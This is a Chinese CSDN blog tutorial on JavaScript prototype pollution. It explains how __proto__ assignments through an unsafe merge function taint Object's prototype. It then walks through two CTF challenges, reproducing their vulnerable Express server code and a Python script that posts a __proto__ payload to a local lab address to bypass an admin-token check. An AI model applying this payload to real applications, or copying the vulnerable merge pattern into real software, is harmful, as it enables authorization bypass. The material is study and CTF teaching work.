2024年网络安全最全安全基础 --- 原型链污染

于 2024-05-01 20:15:50 发布
阅读量32 收藏 20
点赞数 5
分类专栏: 程序员 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84265571/article/details/138378965
版权
文章讲述了JavaScript中__proto__和原型链的概念,展示了如何通过修改对象的原型可能导致原型链污染,并通过实例和代码演示了如何利用merge操作进行潜在的污染,最后强调了防范原型链污染的重要性。
摘要由CSDN通过智能技术生成
实例:

foo.__proto__指向的是Foo类的prototype。若修改foo.__proto__中的值,就可修改Foo类?

// foo是一个简单的JavaScript对象
let foo = {bar:1};

// foo.bar此时为1
console.log(foo.bar);

// 修改foo的原型(即object)
foo.__proto__.bar = 2;

// 查找顺序原因,foo.bar仍然是1
console.log(foo.bar);

// 此时用objecr创建一个空的zoo对象
let zoo = {};

// 查看zoo.bar
console.log(zoo.bar);

解析:

修改 foo 原型foo.__proto__.bar = 2,而 foo 是一个object类的实例,所以实际上是修改了object这个类,给这个类增加了一个属性bar,值为2

后来用object类创建了一个zoo对象,let zoo = {},zoo对象自然也有一个bar属性了

原型链污染定义:

如果攻击者控制并修改了一个对象的原型,那将可以影响所有和这个对象来自同一个类、父类的对象,这种攻击方式就是原型链污染

哪些情况原型链会被污染?

哪些情况可以设置__proto__的值?找到能够控制数组(对象)的“键名”的操作即可:

使用megre测试
function merge (target,source) {
    for(let key in source) {
        if(key in source && key in target){
            merge(target[key],source[key]);
        }else{
            target[key] = source[key];
        }
    }
}

merge操作是最常见可能控制键名的操作,也最能被原型链攻击

在合并过程中,存在赋值的操作 target[key] = source[key],那么,这个key如果是__proto__,是不是就可以原型链污染呢?

使用如下代码进行测试:
let o1 = {};
let o2 = {a:1,"__proto__":{b:2}};
merge(o1,o2);
console.log(o1.a,o1.b);

o3 = {};
console.log(o3.b);

结果:合并成功,原型链未被污染

解析:

js 创建 o2 的过程(let o2 = {a:2,“__proto__”:{b:2}})中,__proto__代表o2的原型了,此时遍历o2的所有键名,拿到的是[a,b],__proto__并不是一个key,也不会修改object的原型

修改代码
let o1 = {};
let o2 = JSON.parse('{"a":1,"__proto__":{"b":2}}');
merge(o1,o2);
console.log(o1.a,o2.b);

o3 = {};
console.log(o3.b);

解析:

JSON解析的情况下,__proto__会被认为是一个真正的“键名”,不代表原型,所以在遍历o2的时候存在这个键,

新建的o3对象,也存在b属性,说明object已被污染

实例

例1:hackit2018
const express = require('express')
var hbs = require('hbs');
var bodyParser = require('body-parser');
const md5 = require('md5');
var morganBody = require('morgan-body');
const app = express();
//目前user并没有admintoken
var user = []; //empty for now
 
var matrix = [];
for (var i = 0; i < 3; i++){
    matrix[i] = [null , null, null];
}
 
function draw(mat) {
    var count = 0;
    for (var i = 0; i < 3; i++){
        for (var j = 0; j < 3; j++){
            if (matrix[i][j] !== null){
                count += 1;
            }
        }
    }
    return count === 9;
}
 
app.use(express.static('public'));
app.use(bodyParser.json());
app.set('view engine', 'html');
morganBody(app);
app.engine('html', require('hbs').__express);
 
app.get('/', (req, res) => {
 
    for (var i = 0; i < 3; i++){
        matrix[i] = [null , null, null];
 
    }
    res.render('index');
})
 
 
app.get('/admin', (req, res) => { 
    /*this is under development I guess ??*/
    console.log(user.admintoken);
    if(user.admintoken && req.query.querytoken && md5(user.admintoken) === req.query.querytoken){
        res.send('Hey admin your flag is <b>flag{prototype_pollution_is_very_dangerous}</b>');
    } 
    else {
        res.status(403).send('Forbidden');
    }    
}
)
 
 
app.post('/api', (req, res) => {
    var client = req.body;
    var winner = null;
 
    if (client.row > 3 || client.col > 3){
        client.row %= 3;
        client.col %= 3;
    }
    matrix[client.row][client.col] = client.data;
    for(var i = 0; i < 3; i++){
        if (matrix[i][0] === matrix[i][1] && matrix[i][1] === matrix[i][2] ){
            if (matrix[i][0] === 'X') {
                winner = 1;
            }
            else if(matrix[i][0] === 'O') {
                winner = 2;
            }
        }
        if (matrix[0][i] === matrix[1][i] && matrix[1][i] === matrix[2][i]){
            if (matrix[0][i] === 'X') {
                winner = 1;
            }
            else if(matrix[0][i] === 'O') {
                winner = 2;
            }
        }
    }
 
    if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'X'){
        winner = 1;
    }
    if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'O'){
        winner = 2;
    } 
 
    if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'X'){
        winner = 1;
    }
    if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'O'){
        winner = 2;
    }
 
    if (draw(matrix) && winner === null){
        res.send(JSON.stringify({winner: 0}))
    }
    else if (winner !== null) {
        res.send(JSON.stringify({winner: winner}))
    }
    else {
        res.send(JSON.stringify({winner: -1}))
    }
 
})
app.listen(3000, () => {
    console.log('app listening on port 3000!')
})
解析:

获取 flag 的条件是传入的querytoken要和user数组本身的admintoken的MD5值相等,且二者都要存在;全文没有对user.afmintoken进行赋值,理论上这个值不存在,但存在以下赋值语句

matrix[client.row][client.col] = client.data;
其中data、row、col,都是post传入的值,都是可控的。所以可构造原型链污染
本地测试

payload:使用python传入参数
import requests
import json

url = "http://192.168.174.123:3000/api"
url1 = "http://192.168.174.123:3000/admin?querytoken=5881ca97cfe9782358a88e0b31092814"

headers = {"Content-type": "application/json"}

data = {"row": "__proto__", "col": "admintoken", "data": "oupeng"}

res1 = requests.post(url, headers=headers, data=json.dumps(data))
# json.dumps与json.parse是相同的 
res2 = requests.get(url1)

print(res2.text)

运行结果:

例2:
'use strict';

const express = require('express');
const bodyParser = require('body-parser')
const cookieParser = require('cookie-parser');
const path = require('path');


const isObject = obj => obj && obj.constructor && obj.constructor === Object;

function merge(a, b) {
    for (var attr in b) {
        if (isObject(a[attr]) && isObject(b[attr])) {
            merge(a[attr], b[attr]);
        } else {
            a[attr] = b[attr];
        }
    }
    return a
}

function clone(a) {
    return merge({}, a);
}

// Constants
const PORT = 8080;
const HOST = '0.0.0.0';
const admin = {};

// App
const app = express();
app.use(bodyParser.json())
app.use(cookieParser());

app.use('/', express.static(path.join(__dirname, 'views')));
app.post('/signup', (req, res) => {
    var body = JSON.parse(JSON.stringify(req.body));
    var copybody = clone(body)
    if (copybody.name) {
        res.cookie('name', copybody.name).json({
            "done": "cookie set"
        });
    } else {
        res.json({
            "error": "cookie not set"
        })
    }
});
app.get('/getFlag', (req, res) => {
    var аdmin = JSON.parse(JSON.stringify(req.cookies))
    if (admin.аdmin == 1) {
        res.send("hackim19{}");
    } else {
        res.send("You are not authorized");
    }
});
app.listen(PORT, HOST);
console.log(`Running on http://${HOST}:${PORT}`);
解析:

分析题目,获取flag的条件是:admin.admin == 1,而 admin 本身是一个 object ,其admin 属性本身并不存在,且有敏感函数 merge

function merge(a, b) {    
    for (var attr in b) {        
        if (isObject(a[attr]) && isObject(b[attr])) {
            merge(a[attr], b[attr]);
        } else {
            a[attr] = b[attr];
        }
    }    
return a;
}

// merge函数的作用是进行对象的合并,涉及到对象的赋值,键值可控,即可出发原型链污染
本地测试


显式为undefined,如下

写在最后

在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。

需要完整版PDF学习资源私我

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84265571
关注
  • 5
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ppfuzz:用 Rust 编写的用于扫描客户端原型污染漏洞的快速工具。 :crab:
08-05
模糊不清 原型污染模糊器 用 Rust 编写的用于扫描客户端原型污染漏洞的快速工具。 :crab: 贡献 归因 致谢 执照 安装 二进制 简单地,从发布页面下载一个预先构建的二进制文件并运行! 来源 注意:应该安装Rust ! 使用cargo : :play_button: cargo install ppfuzz - 要么 从源代码手动构建可执行文件: :play_button: git clone https://github.com/dwisiswant0/ppfuzz :play_button: cd ppfuzz && cargo build --release # binary file located at target/release/ppfuzz 依赖关系 ppfuzz使用Chromiumoxide ,它需要安装 Chrome 或 Chromium 浏览器。 如果设置了CHROME环境变量,那么它将使用它作为默认的可执行文件。 否
最棒的AXURE原型系列1-6季的全部作品
06-25
最棒的AXURE原型系列1-6季的全部作品 最棒的AXURE原型系列1-6季的全部作品 最棒的AXURE原型系列1-6季的全部作品 最棒的AXURE原型系列1-6季的全部作品 最棒的AXURE原型系列1-6季的全部作品 最棒的AXURE原型系列1-6季...
原型链污染
m0_62422842的博客
06-06 2259
原型链污染是一个关于前端js的相关漏洞,原型链污染可拆分为两部分,什么是原型链,又如何进行污染
安全基础 --- 原型链污染
weixin_62443409的博客
09-05 6574
prototype:一个类的属性,所有类对象在实例化的时候会拥有prototype中的属性和方法__proto__:一个对象的__proto__属性,指向这个对象所在的类的prototype属性如果攻击者控制并修改了一个对象的原型,那将可以影响所有和这个对象来自同一个类、父类的对象,这种攻击方式就是原型链污染
js原型链污染(超详细)
qq_51586883的博客
08-23 5862
js创建对象的三种方法 : 普通创建 var person={name:'lihuaiqiu','age','19'} ​ var person={} //创建空对象 构造函数方法创建 function person(){ this.name="liahuqiu"; this.test=function () { return 23333; ​ } } person.prototype.a=3; web=new person(); console.l...
网络安全--原型链污染
m0_69435261的博客
08-02 1392
在对象son中寻找last_name如果找不到,则在中寻找last_name如果仍然找不到,则继续在中寻找last_name依次寻找,直到找到null结束。比如,的__proto__就是null。
JS继承--原型链继承和类式继承
10-27
当我们尝试访问对象的一个属性时,如果该对象本身没有这个属性,JavaScript会向上查找原型链,直到找到该属性或者到达原型链的顶端(即`null`)。 示例中的`proInherit`函数展示了如何实现原型链继承。它创建了一...
新一代网络安全模型(OSCA).pdf
01-20
OSCA-新一代网络安全模型 OSCA原型设计借鉴于OODA循环理论,将OODA循环理论中的观察(Observe)映射为...通过利用OSCA模型思想构建新一代网络安全防御体系,构筑IT基础资源和业务之间的桥,实现业务安全的最终目标。
佛山大数据项目标签原型设计-需求说明书.pdf
11-27
佛山大数据项目标签原型设计-需求说明书.pdf
原型链污染漏洞+前后端实战案例
08-04
原型链污染漏洞是一种安全问题,它允许攻击者通过篡改或注入代码来操纵对象的原型,从而可能导致数据泄漏、逻辑错误甚至完全控制应用程序。本文将深入探讨原型链污染的概念、其产生的原因以及在前端和后端开发中的...
渗透攻击漏洞之——原型链污染
weixin_51525416的博客
08-02 3433
JavaScript 中所有的对象都有一个内置属性,称为它的prototype(原型)。它本身是一个对象,故原型对象也会有它自己的原型,逐渐构成了原型链原型链终止于拥有null作为其原型的对象上。指向对象原型的属性并不是prototype。它的名字不是标准的,但实际上所有浏览器都使用__proto__。访问对象原型的标准方法是 Object.getPrototypeOf()。JavaScript 规定,所有对象都有自己的原型对象(prototype)。
nodejs原型链污染基础
qq_63928796的博客
02-06 716
原型链污染是一种针对JavaScript运行时的注入攻击。通过原型链污染,攻击者可能控制对象属性的默认值。这允许攻击者篡改应用程序的逻辑,还可能导致拒绝服务,或者在极端情况下,远程执行代码。比较出名的一个原型链污染漏洞,是在2019初,在Snyk的安全研究人员透露出流行的JavaScript库—Lodash的严重的漏洞,这允许黑客攻击多个web应用程序。漏洞细节:https://security.snyk.io/vuln/SNYK-JS-LODASH-450202。
记录js原型链污染
RuiLike的博客
05-17 164
对象.proto=构造器(构造函数).prototype构造器.prototype其实也是一个对象,为构造函数的原型对象,同样有__proto__属性,一直通过原型链__proto__最终可找到null。我们可以通过Foo.prototype来访问Foo类的原型,但Foo实例化出来的对象,是不能通过prototype访问原型的。这时候,就该__proto__登场了。
Python原型链污染
Elite的博客
07-23 1074
Python 中的原型链污染(Prototype Pollution)是指通过修改对象原型链中的属性,对程序的行为产生意外影响或利用漏洞进行攻击的一种技术。
2024网安最全Java中对象的比较_java定义比较总结(1)
最新发布
2401_84264662的博客
05-01 23
在2.2中自定义类型equal方法比较的是两个变量的地址而不是大小,那要是硬要比较大小应该怎么做呢?我们可以覆写基类的equal方法@Override// 自己和自己比较// o如果是null对象,或者o不是Card的子类} // 注意基本类型可以直接比较,但引用类型最好调用其equal方法覆写的格式大同小异1. 如果两个变量都指向同一个变量那么返回true;2. 如果有传入的变量为null,那么返回false;
浅谈原型污染
GuoZebin的博客
07-23 1729
漏洞原因 其实漏洞很简单,举一个例子:lodash 中 defaultsDeep 方法, _.defaultsDeep({ 'a': { 'b': 2 } }, { 'a': { 'b': 1, 'c': 3 } }) 输出: { 'a': { 'b': 2, 'c': 3 } } 如上例,该方法: 分配来源对象(该方法的第二个参数)的可枚举属性到目标对象(该方法的第一个参数)...
"软件安全开发-V4.2:软件生命周期与安全模型详解
在《软件安全开发-V4.2.pptx》这一课程中,我们深入探讨了软件安全开发的各个知识领域和子域,包括软件安全开发生命周期、软件安全实现、软件安全测试、软件安全需求及设计以及软件安全交付等方面的内容。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值